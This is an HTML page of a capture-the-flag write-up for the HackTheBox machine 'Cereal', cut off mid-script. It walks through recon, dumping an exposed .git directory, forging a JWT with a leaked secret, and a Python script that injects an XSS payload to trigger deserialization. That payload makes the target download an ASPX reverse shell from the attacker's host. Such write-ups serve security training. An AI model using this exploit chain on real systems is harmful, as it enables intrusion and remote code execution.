<!DOCTYPE html>
<html lang="en">
    <head>
        <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async=""></script>
        <script>
          window.OneSignal = window.OneSignal || [];
          OneSignal.push(function() {
            OneSignal.init({
              appId: "f80eb8e0-fe33-466b-9e51-55cf70a369c0",
            });
          });
        </script>
</script><script type="text/javascript" src="/lightgallery/lightbox.js"></script>
<link rel="stylesheet" href="/lightgallery/lightbox.css">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="preload" as="style" href="/assets/css/post.css">
<link rel="preload" as="style" href="/assets/css/syntax.css">
<link rel="stylesheet" href="/assets/css/post.css">
<link rel="stylesheet" href="/assets/css/syntax.css">
<link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css">
<link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js">
<link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"/>
<script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script>
<script src="/assets/js/dist/toc.min.js" async></script>
<meta name="description" content="Getting TGT using secretdump for usernames got from smb dirs and using rpcclient to chnage the user password , got a zip file that was a memory dump and getting NTLM hash of user lsass mimikatz ad then admin is around dumping the ntds.dit file."/>
<meta property="og:title" content="Hackthebox Cereal writeup"/>
<meta property="og:description" content="Getting TGT using secretdump for usernames got from smb dirs and using rpcclient to chnage the user password , got a zip file that was a memory dump and getting NTLM hash of user lsass mimikatz ad then admin is around dumping the ntds.dit file."/>
<meta property="og:image" content="/hackthebox/cereal/cereal.png"/>
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@0xdedinfosec">
<meta property="twitter:title" content="Hackthebox Cereal writeup">
<meta name="twitter:creator" content="@0xdedinfosec">
<meta name="twitter:description" content="Getting TGT using secretdump for usernames got from smb dirs and using rpcclient to chnage the user password , got a zip file that was a memory dump and getting NTLM hash of user lsass mimikatz ad then admin is around dumping the ntds.dit file.">
<meta name="twitter:image" content="https://0xdedinfosec.github.io/hackthebox/cereal/cereal.png">
<title>Hackthebox Cereal writeup | 0xDedinfosec</title>
<meta name="generator" content="Jekyll v4.1.0"/>
<meta property="og:title" content="Hackthebox Cereal writeup"/>
<meta name="author" content="Dedinfosec"/>
<meta property="og:locale" content="en_US"/>
<meta name="description" content="Introduction@Cereal:~$"/>
<meta property="og:description" content="Introduction@Cereal:~$"/>
<link rel="canonical" href="http://0xdedinfosec.github.io/posts/htb-cereal/"/>
<meta property="og:url" content="http://0xdedinfosec.github.io/posts/htb-cereal/"/>
<meta property="og:site_name" content="0xDedinfosec"/>
<meta property="og:type" content="article"/>
<meta property="article:published_time" content="2021-01-27T00:00:00+00:00"/>
<meta name="twitter:card" content="summary"/>
<meta property="twitter:title" content="Hackthebox Cereal writeup"/>
<meta name="twitter:site" content="@0xdedinfosec"/>
<meta name="twitter:creator" content="@Dedinfosec"/>
<meta name="google-site-verification" content="UfGDXP7MiKxFhS_R1LKVTpk3Cf20Hj-53gHZJrOFXuA"/>
<script type="application/ld+json">
     {"@type":"BlogPosting","headline":"Hackthebox Cereal writeup","dateModified":"2021-01-27T00:00:00+00:00","datePublished":"2021-01-27T00:00:00+00:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0xdedinfosec.github.io/posts/htb-cereal/"},"author":{"@type":"Person","name":"Dedinfosec"},"url":"http://0xdedinfosec.github.io/posts/htb-cereal/","description":"Introduction@Cereal:~$","@context":"https://schema.org"}
</script>
<!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license -->
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192"  href="/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
<link rel="dns-prefetch" href="https://fonts.gstatic.com">
<link rel="preconnect" href="cdn.jsdelivr.net">
<link rel="dns-prefetch" href="cdn.jsdelivr.net">
<link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin>
<link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous">
<link rel="preload" as="style" href="/assets/css/main.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous">
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous">
<link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<script>
    window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>');
</script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous" async></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script>
<script src="/assets/js/dist/commons.js" async></script>
<script src="/assets/js/dist/timeago.min.js" async></script>
<link rel="preload" as="style" href="/assets/css/post.css">
<link rel="preload" as="style" href="/assets/css/syntax.css">
<link rel="stylesheet" href="/assets/css/post.css">
<link rel="stylesheet" href="/assets/css/syntax.css">
<link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css">
<link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js">
<link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"/>
<script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script>
<script src="/assets/js/dist/toc.min.js" async></script>
<meta name="description" content="Getting TGT using secretdump for usernames got from smb dirs and using rpcclient to chnage the user password , got a zip file that was a memory dump and getting NTLM hash of user lsass mimikatz ad then admin is around dumping the ntds.dit file."/>
<meta property="og:title" content="Hackthebox Cereal writeup"/>
<meta property="og:description" content="Getting TGT using secretdump for usernames got from smb dirs and using rpcclient to chnage the user password , got a zip file that was a memory dump and getting NTLM hash of user lsass mimikatz ad then admin is around dumping the ntds.dit file."/>
<meta property="og:image" content="/hackthebox/cereal/cereal.png"/>
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@0xdedinfosec">
<meta property="twitter:title" content="Hackthebox Cereal writeup">
<meta name="twitter:creator" content="@0xdedinfosec">
<meta name="twitter:description" content="Getting TGT using secretdump for usernames got from smb dirs and using rpcclient to chnage the user password , got a zip file that was a memory dump and getting NTLM hash of user lsass mimikatz ad then admin is around dumping the ntds.dit file.">
<meta name="twitter:image" content="https://0xdedinfosec.github.io/hackthebox/cereal/cereal.png">
<script src="/assets/js/dist/tooltip-loader.min.js" async></script>
</head>
<body data-spy="scroll" data-target="#toc">
    <div id="sidebar" class="d-flex flex-column">
        <div id="nav-wrapper">
            <div id="profile-wrapper" class="d-flex flex-column">
                <div id="avatar" class="d-flex justify-content-center">
                    <a href="/" alt="avatar">
                        <img src="/assets/img/sample/avater1.png" alt="avatar">
                    </a>
                </div>
                <div class="profile-text mt-3">
                    <div id="site-title">
                        <a href="/">0xDedinfosec</a>
                    </div>
                    <div id="site-subtitle" class="font-italic">InfoSec/Cybersec Blog And Writeups</div>
                </div>
            </div>
            <ul class="nav flex-column">
                <li class="nav-item d-flex justify-content-center ">
                    <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100">
                        <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i>
                        <span>HOME</span>
                    </a>
                </li>
                <li class="nav-item d-flex justify-content-center ">
                    <a href="/tabs/donation/" class="nav-link d-flex justify-content-center align-items-center w-100">
                        <i class="fa-fw fab fa-donate ml-3 mr-3 unloaded"></i>
                        <span>DONATION-OSCP</span>
                    </a>
                </li>
                <li class="nav-item d-flex justify-content-center ">
                    <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100">
                        <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i>
                        <span>CATEGORIES</span>
                    </a>
                </li>
                <li class="nav-item d-flex justify-content-center ">
                    <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100">
                        <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i>
                        <span>TAGS</span>
                    </a>
                </li>
                <li class="nav-item d-flex justify-content-center ">
                    <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100">
                        <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i>
                        <span>TIMELINE</span>
                    </a>
                </li>
                <li class="nav-item d-flex justify-content-center ">
                    <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100">
                        <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i>
                        <span>WHOAMI</span>
                    </a>
                </li>
            </ul>
        </div>
        <div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4">
            <span id="mode-toggle-wrapper">
                <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License -->
                <i class="mode-toggle fas fa-sun" light-mode-invisible></i>
                <i class="mode-toggle fas fa-moon" dark-mode-invisible></i>
                <script type="text/javascript">
                    class ModeToggle {
                        static get MODE_KEY() {
                            return "mode";
                        }
                        static get DARK_MODE() {
                            return "dark";
                        }
                        static get LIGHT_MODE() {
                            return "light";
                        }
                        constructor() {
                            if (this.mode != null) {
                                if (this.mode == ModeToggle.DARK_MODE) {
                                    if (!this.isDarkPrefer) {
                                        this.setDark();
                                    }
                                } else {
                                    if (this.isDarkPrefer) {
                                        this.setLight();
                                    }
                                }
                            }
                            var self = this;
                            /* always follow the system prefers */
                            this.sysDarkPrefers.addListener(function() {
                                if (self.mode != null) {
                                    if (self.mode == ModeToggle.DARK_MODE) {
                                        if (!self.isDarkPrefer) {
                                            self.setDark();
                                        }
                                    } else {
                                        if (self.isDarkPrefer) {
                                            self.setLight();
                                        }
                                    }
                                    self.clearMode();
                                }
                            });
                        }
                        /* constructor() */
                        setDark() {
                            $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
                            sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
                        }
                        setLight() {
                            $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
                            sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
                        }
                        clearMode() {
                            $('html').removeAttr(ModeToggle.MODE_KEY);
                            sessionStorage.removeItem(ModeToggle.MODE_KEY);
                        }
                        get sysDarkPrefers() {
                            return window.matchMedia("(prefers-color-scheme: dark)");
                        }
                        get isDarkPrefer() {
                            return true;
                        }
                        get mode() {
                            return sessionStorage.getItem(ModeToggle.MODE_KEY);
                        }
                        flipMode() {
                            if ((this.mode == null && this.isDarkPrefer) || this.mode == ModeToggle.DARK_MODE) {
                                this.setLight();
                            } else {
                                /* light mode or default-light */
                                this.setDark();
                            }
                        }
                    }
                    /* ModeToggle */
                    let toggle = new ModeToggle();
                    $(".mode-toggle").click(function() {
                        toggle.flipMode();
                    });
                </script>
            </span>
            <span class="icon-border"></span>
            <a href="https://www.hackthebox.eu/home/users/profile/262485" target="_blank">
            </i><i class="fas fa-cube"></i>
            </a>
            <a href="https://github.com/0xdedinfosec" target="_blank">
                <i class="fab fa-github"></i>
            </a>
            <a href="#">
                <i class="fab fa-discord"></i>
            </a>
            <a href="#">
                <i class="fab fa-twitter"></i>
            </a>
            <a href="https://www.facebook.com/dedsecinfoServices/" target="_blank"> <i class="fab fa-facebook"></i> </a>
            </div></div>
<div id="main-wrapper">
    <div id="topbar-wrapper" class="row justify-content-center topbar-down">
        <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
            <span id="breadcrumb">
                <span>
                    <a href="/">Posts </a>
                </span>
                <span>Hackthebox Cereal writeup</span>
            </span>
            <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>
            <div id="topbar-title">Post</div>
            <i id="search-trigger" class="fas fa-search fa-fw"></i>
            <span id="search-wrapper" class="align-items-center">
                <i class="fas fa-search fa-fw"></i>
                <input class="form-control" id="search-input" type="search" placeholder="Search...">
                <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
            </span>
            <span id="search-cancel">Cancel</span>
        </div>
    </div>
    <div id="main">
        <div class="row">
            <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">
                <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
                    <h1 data-toc-skip>Hackthebox Cereal writeup</h1>
                    <div class="post-meta text-muted d-flex flex-column">
                        <div>
                            <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Wed, Jan 27, 2021, 12:00 AM +0000">
                                Jan 27, 2021 <i class="unloaded">2021-01-27T00:00:00+00:00</i>
                            </span>
                            on <a href='/categories/hackthebox/'>Hackthebox</a>
                            , <a href='/categories/active/'>active</a>
                        </div>
                    </div>
                    <div class="post-content">
                        <img src="/hackthebox/cereal/cereal.png">
                        <h1>Introduction@Cereal:~$</h1>
                            <table>
                                <thead>
                                    <tr>
                                        <th>Column
                                        <th>
                                            Details
                                <tbody>
                                    <tr>
                                        <td>Name
                                        <td>
                                            Cereal
                                    <tr>
                                        <td>IP
                                        <td>
                                            10.10.10.217
                                    <tr>
                                        <td>Points
                                        <td>
                                            40
                                    <tr>
                                        <td>Os
                                        <td>
                                            Windows
                                    <tr>
                                        <td>Difficulty
                                        <td>
                                            Hard
                                    <tr>
                                        <td>Creator
                                        <td>
                                            <a href="https://www.hackthebox.eu/home/users/profile/22435"
                                                target="_blank">Micah </a>
                                    <tr>
                                        <td>Out On
                                        <td>21 Nov 2020
                            </table>
                            <h1 id="pwned">Pwned</h1>
                            <html>

                            <head>
                                <link rel="stylesheet" type="text/css" href="/asciinema-player.css" />

                            <body>
                                <asciinema-player src="Cereal.cast" start-at="0" autoplay="1.5" speed="2.0" loop="1"
                                    cols="150" rows="20"></asciinema-player>
                                <script src="/asciinema-player.js"></script>
                                <h1 id="recon">Recon</h1>
                                <h2 id="nmap">Nmap</h2>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

┌─[root@d3dsec]─[~/Desktop/HTB/Cereal]
└──╼ #<span class="k">cat nmap/result.nmap</span> 
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap <span class="nt">-sC -sV -oA </span>/result 10.10.10.217
Nmap scan report for 10.10.10.217
Host is up (0.17s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
<span class="nt">22/tcp  open  ssh      OpenSSH for_Windows_7.7 (protocol 2.0)</span>
<span class="nt">| ssh-hostkey: 
|   2048 08:8e:fe:04:8c:ad:6f:df:88:c7:f3:9a:c5:da:6d:ac (RSA)
|   256 fb:f5:7b:a1:68:07:c0:7b:73:d2:ad:33:df:0a:fc:ac (ECDSA)
|_  256 cc:0e:70:ec:33:42:59:78:31:c0:4e:c2:a5:c9:0e:1e (ED25519)</span>
80/tcp  open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://10.10.10.217/
443/tcp open  ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Cereal
| ssl-cert: Subject: commonName=cereal.htb
| Subject Alternative Name: DNS:cereal.htb, DNS:source.cereal.htb
| Not valid before: 2020-11-11T19:57:18
|_Not valid after:  2040-11-11T20:07:19
|_ssl-date: 2021-01-15T04:58:45+00:00; +8m55s from scanner time.
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8m54s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.55 seconds
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    So basically Three ports are opened <code
                                        class="language-plaintext highlighter-rouge">22:ssh</code>
                                    <code class="language-plaintext highlighter-rouge">80:http</code>
                                    <code class="language-plaintext highlighter-rouge">443:https</code>
                                </p>
                                <p>
                                    There is two <code class="language-plaintext highlighter-rouge">domain</code> name in nmap result Let's first add it in our <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd1.png
                                        alt="cmd" />
                                </p>
                                <h2 id="port-80">cereal.htb</h2>
                                <p>
                                    There is a simple <code class="language-plaintext highlighter-rouge">Login page</code>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/web.png
                                        alt="80" />
                                </p>
                                <h2>source.cereal.htb</h2>
                                <p>
                                    They give us <code class="language-plaintext highlighter-rouge">error</code> and path of file.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/web1.png
                                        alt="80" />
                                </p>
                                <p>
                                    Let's use <code class="language-plaintext highlighter-rouge">gobuster</code> on both of domain name.
                                </p>
                                <p>
                                    After that i found <code class="language-plaintext highlighter-rouge">.git</code> directory with help of <code class="language-plaintext highlighter-rouge">gobuster</code>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd2.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Let's dump <code class="language-plaintext highlighter-rouge">.git</code> directory with help of <code class="language-plaintext highlighter-rouge">GitTools</code> testing.
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://github.com/internetwache/GitTools" target="_blank">GitTools</a>
                                </blockquote>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
5
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">git clone https://github.com/internetwache/GitTools
cd GitTools/Dumper/
ls
cat README.md
bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd3.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    After that Let's use <code class="language-plaintext highlighter-rouge">Extractor</code> to extract from the <code class="language-plaintext highlighter-rouge">dump</code> directory.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">cd ../Extractor/
ls
cat README.md
bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd4.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    After extractor finish Let's go to <code class="language-plaintext highlighter-rouge">all_dump</code> directory and try to find <code class="language-plaintext highlighter-rouge">something</code> interesting.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd5.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    I found secret inside the <code class="language-plaintext highlighter-rouge">1-8f2a1a88f15b9109e1f63e4e4551727bfb38eee5/Services/UserService.cs</code> file.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">Secret : secretlhfIH&FY*#oysuflkhskjfhefesf</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd6.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    After check all the files inside <code class="language-plaintext highlighter-rouge">1-8f2a1a88f15b9109e1f63e4e4551727bfb38eee5</code> directory.
                                </p>
                                <p>
                                    <code class="language-plaintext highlighter-rouge">deserialization</code> can’t use ysoserial because of custom <code class="language-plaintext highlighter-rouge">protection</code>, but we can use deserialization of the <code class="language-plaintext highlighter-rouge">DownloadManager</code> object for upload aspx shell.
                                </p>
                                <p>
                                    vulnerability in the file <code class="language-plaintext highlighter-rouge">"ClientApp/src/AdminPage/AdminPage.jsx"</code>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd7.png
                                        alt="cmd" />
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://snyk.io/vuln/npm:react-marked-markdown:20180517" target="_blank">Cross-site Scripting (XSS)</a>
                                </blockquote>
                                <p>
                                    With help of this <code class="language-plaintext highlighter-rouge">xss</code> we can do server-side requests and trigger the <code class="language-plaintext highlighter-rouge">deserialization</code>.
                                </p>
                                <p>
                                    But for that we need to create our <code class="language-plaintext highlighter-rouge">jwt_token</code> with exposed <code class="language-plaintext highlighter-rouge">secret</code>.
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://github.com/ticarpi/jwt_tool" target="_blank">The JSON Web Token Toolkit v2</a>
                                </blockquote>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool/
ls -al
pip3 install -r requirements.txt</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd8.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    Let's create the <code class="language-plaintext highlighter-rouge">jwt_token</code>
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">python3 jwt_tool.py -b -S hs256 -p 'secretlhfIH&FY*#oysuflkhskjfhefesf' $(echo -n '{"alg":"HS256","typ":"JWT"}' | base64).$(echo -n '{"name": "1", "exp":' `date -d "+7 days" +%s`} | base64 -w0).</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/terminal.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    I got my <code class="language-plaintext highlighter-rouge">jwt_token</code> save this in a text file we will use it in <code class="language-plaintext highlighter-rouge">future</code>.
                                </p>
                                <div class="language-bash highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span class="s2">jwt_token : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiMSIsImV4cCI6MTYxMjI0NDk0NX0.OCdBywBoBpXyDdO57Bq74VxXuyftTkmz_wvtiTOAxBw</span>
                                                                </pre>
                                                </table>
                                            </code>
                                    </div>
                                </div>
                                <p>
                                    Now we need <code class="language-plaintext highlighter-rouge">shell.aspx</code>.
                                </p>
                                <blockquote>
                                    <code class="language-plaintext highlighter-rouge">Link</code> : <a href="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx" target="_blank">Shell.aspx</a>
                                </blockquote>
                                <p>
                                    Edit the <code class="language-plaintext highlighter-rouge">shell.aspx</code> and change the <strong>host</strong> and <strong>port</strong>.
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd9.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    <img class="lozad" src=/hackthebox/cereal/cmd10.png
                                        alt="cmd" />
                                </p>
                                <p>
                                    After that i create a <code class="language-plaintext highlighter-rouge">python</code> script for upload <code class="language-plaintext highlighter-rouge">shell.aspx</code>.
                                </p>
                                <h2>
                                    Creating Python Script
                                </h2>
                                <p>
                                    <img class="lozad" src=/assets/img/sample/hacker.gif
                                        alt="Creating Script" />
                                </p>
                                <p>
                                    Change ip and <code class="language-plaintext highlighter-rouge">jwt_token</code> which we create in past.
                                </p>
                                <div class="language-python highlighter-rouge">
                                    <div class="highlight">
                                        <code>
                                                <table class="rouge-table">
                                                    <tbody>
                                                        <tr>
                                                            <td class="rouge-gutter gl">
                                                                <pre class="lineno">
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre>
                                                            <td class="rouge-code">
                                                                <pre>

<span style="color: #008800; font-weight: bold;">import</span> requests
<span style="color: #008800; font-weight: bold;">from</span> urllib3.exceptions <span style="color: #008800; font-weight: bold;">import</span> InsecureRequestWarning
<span style="color: #008800; font-weight: bold;">import</span> base64

<span class="o">requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


jwt_token = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiMSIsImV4cCI6MTYxMjI0NzIzNX0.ldPiCS3ry_B1f3KAc5d1gzgMzq4bhtjfTD_OpSLStQA'
my_ip = '10.10.14.6'

URL = 'https://cereal.htb/requests'


js_payload = """var jwt_token = '"""+jwt_token+ """';
targeturl = 'https://cereal.htb/requests';

req = new XMLHttpRequest;
var payload = JSON.stringify({"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://""" +my_ip+"""/shell.aspx","FilePath":"C:/inetpub/source/uploads/shell.aspx"}'});

req.onreadystatechange = function() {
    if (req.readyState == 4) {
        var id = JSON.parse(this.responseText).id;
        //console.log(id)

        req2 = new XMLHttpRequest;
        req2.open('GET', targeturl + "/" + id, false);
        req2.setRequestHeader("Authorization", "Bearer " + jwt_token);
        req2.send();
    }
}</span>
<span class="se">req.open('POST', targeturl, false);
req.setRequestHeader("Authorization", "Bearer " + jwt_token);
